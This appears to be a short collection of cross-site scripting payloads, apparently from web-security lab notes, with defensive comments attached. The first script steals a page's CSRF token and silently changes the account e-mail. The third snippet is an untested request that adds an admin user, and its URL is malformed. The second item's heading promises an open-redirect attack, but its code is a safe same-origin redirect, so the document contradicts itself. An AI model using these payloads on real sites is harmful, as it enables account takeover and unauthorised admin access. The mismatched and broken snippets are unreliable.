1. The script below sends a GET request to /my-account, reads the CSRF token from the response, and then sends a POST request to /my-account/change-email with that token:
<script>
// Request the account page from the origin that is running this script.
// The URL is relative, so the browser treats it as a same-origin request;
// handleResponse runs once the response has loaded.
const accountReq = new XMLHttpRequest();
accountReq.open('get', '/my-account', true);
accountReq.onload = handleResponse;
accountReq.send();
/**
 * Load handler for the /my-account request.
 *
 * Reads the anti-CSRF token from the returned markup (a field rendered as
 * `name="csrf" value="..."`) and replays it in a POST to
 * /my-account/change-email with a fixed e-mail address.
 *
 * Defensive reading: a script running in the page's own origin can read the
 * token, so an anti-CSRF token alone does not protect this action once
 * script injection is possible. Preventing the injection (output encoding,
 * a restrictive Content-Security-Policy) and requiring the current password
 * for an e-mail change are the controls that matter here.
 *
 * @this {XMLHttpRequest} The request whose load event fired.
 * @throws {TypeError} If the response contains no matching csrf field.
 */
function handleResponse() {
    const csrfPattern = /name="csrf" value="(\w+)"/;
    const found = this.responseText.match(csrfPattern);
    // No null check: a response without the field fails on the index below.
    const token = found[1];
    const body = `csrf=${token}&email=test@test.com`;

    const changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send(body);
}
</script>
  1. XSS to open redirect:
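/**
 * Navigate the current window to a URL on the same site as the current page.
 *
 * The target is resolved against the current location and accepted only when
 * its scheme and host match the page's. Absolute URLs to other hosts,
 * protocol-relative URLs ("//host/path") and other schemes such as
 * "javascript:" are refused, so the function cannot be used as an open
 * redirect. Scheme and host are compared rather than `origin`, because
 * opaque origins all serialise to "null" and would compare equal.
 *
 * @param {string} urlPath - Path or URL to navigate to, e.g. "/new-page".
 * @returns {void}
 * @throws {TypeError} If urlPath cannot be parsed as a URL.
 * @throws {Error} If the resolved URL is not on the current scheme and host.
 */
function redirectTo(urlPath) {
    const current = window.location;
    const target = new URL(urlPath, current.href);

    const sameSite =
        target.protocol === current.protocol && target.host === current.host;
    if (!sameSite) {
        throw new Error('redirectTo: refusing to navigate outside the current origin');
    }

    // Assign the parsed, normalised URL so the value checked is the value used.
    current.href = target.href;
}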

// Usage example: send the browser to the same-site path "/new-page".
const nextPage = "/new-page";
redirectTo(nextPage);
  1. Alternative (untested):
// Issues a GET to the admin path /admin/users/add, carrying an e-mail,
// password, name and username in the URL (presumably a user-creation
// endpoint; the page marks this snippet as untested).
//
// As written, the parameter string is appended directly to the path with no
// separator, so the request line a server logs is the path immediately
// followed by "email=...".
//
// Defensive reading: an endpoint that creates accounts should not act on GET
// and should not take credentials in the URL, where they are written to
// access logs and browser history. Require POST with an anti-CSRF token and
// re-check the caller's privileges server-side.
const creds = 'email=peter@pan.com&password=test&name=test&username=test';
const addUserReq = new XMLHttpRequest();
addUserReq.open("GET", `/admin/users/add${creds}`, true);
addUserReq.send();